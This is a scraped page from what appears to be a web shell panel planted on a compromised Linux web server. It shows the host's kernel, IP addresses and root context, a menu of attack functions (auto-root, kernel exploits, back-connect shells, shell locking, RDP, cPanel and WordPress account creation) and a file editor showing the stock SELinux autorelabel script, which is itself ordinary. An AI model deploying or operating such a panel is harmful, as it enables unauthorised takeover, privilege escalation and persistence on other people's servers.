Linux lx05.r4.net.br 5.14.0-611.55.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 19 15:19:29 EDT 2026 x86_64
Apache
: 177.84.130.146 | : 216.73.216.90
1168 Domain
8.1.34
root
www.github.com/beanqz
+ Create Folder
+ Create File
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
/
usr /
libexec /
selinux /
[ HOME SHELL ]
Name
Size
Permission
Action
hll
[ DIR ]
drwxr-xr-x
selinux-autorelabel
2.58
KB
-rwxr-xr-x
semanage_migrate_store
9
KB
-rwxr-xr-x
Delete
Unzip
Zip
N30N
Close
Code Editor : selinux-autorelabel
#!/usr/bin/bash # # Do automatic relabelling # # . /etc/init.d/functions # If the user has this (or similar) UEFI boot order: # # Windows | grub | Linux # # And decides to boot into grub/Linux, then the reboot at the end of autorelabel # would cause the system to boot into Windows again, if the autorelabel was run. # # This function restores the UEFI boot order, so the user will boot into the # previously set (and expected) partition. efi_set_boot_next() { # NOTE: The [ -x /usr/sbin/efibootmgr ] test is not sufficent -- it could # succeed even on system which is not EFI-enabled... if ! efibootmgr > /dev/null 2>&1; then return fi # NOTE: It it possible that some other services might be setting the # 'BootNext' item for any reasons, and we shouldn't override it if so. if ! efibootmgr | grep --quiet -e 'BootNext'; then CURRENT_BOOT="$(efibootmgr | grep -e 'BootCurrent' | sed -re 's/(^.+:[[:space:]]*)([[:xdigit:]]+)/\2/')" efibootmgr -n "${CURRENT_BOOT}" > /dev/null 2>&1 fi } relabel_selinux() { # if /sbin/init is not labeled correctly this process is running in the # wrong context, so a reboot will be required after relabel AUTORELABEL= . /etc/selinux/config echo "0" > /sys/fs/selinux/enforce [ -x /bin/plymouth ] && plymouth --quit if [ "$AUTORELABEL" = "0" ]; then echo echo $"*** Warning -- SELinux ${SELINUXTYPE} policy relabel is required. " echo $"*** /etc/selinux/config indicates you want to manually fix labeling" echo $"*** problems. Dropping you to a shell; the system will reboot" echo $"*** when you leave the shell." sulogin else echo echo $"*** Warning -- SELinux ${SELINUXTYPE} policy relabel is required." echo $"*** Relabeling could take a very long time, depending on file" echo $"*** system size and speed of hard drives." OPTS=`cat /.autorelabel` # by default, use as many threads as there are available # another -T X in $OPTS will override the default value OPTS="-T 0 $OPTS" [ -x "/usr/sbin/quotaoff" ] && /usr/sbin/quotaoff -aug echo echo $"Running: /sbin/fixfiles $OPTS restore" /sbin/fixfiles $OPTS restore fi rm -f /.autorelabel /usr/lib/dracut/dracut-initramfs-restore efi_set_boot_next if [ -x /usr/bin/grub2-editenv ]; then grub2-editenv - incr boot_indeterminate >/dev/null 2>&1 fi sync systemctl reboot } # Check to see if a full relabel is needed if [ "$READONLY" != "yes" ]; then restorecon $(awk '!/^#/ && $4 !~ /noauto/ && $2 ~ /^\// { print $2 }' /etc/fstab) >/dev/null 2>&1 relabel_selinux fi
Close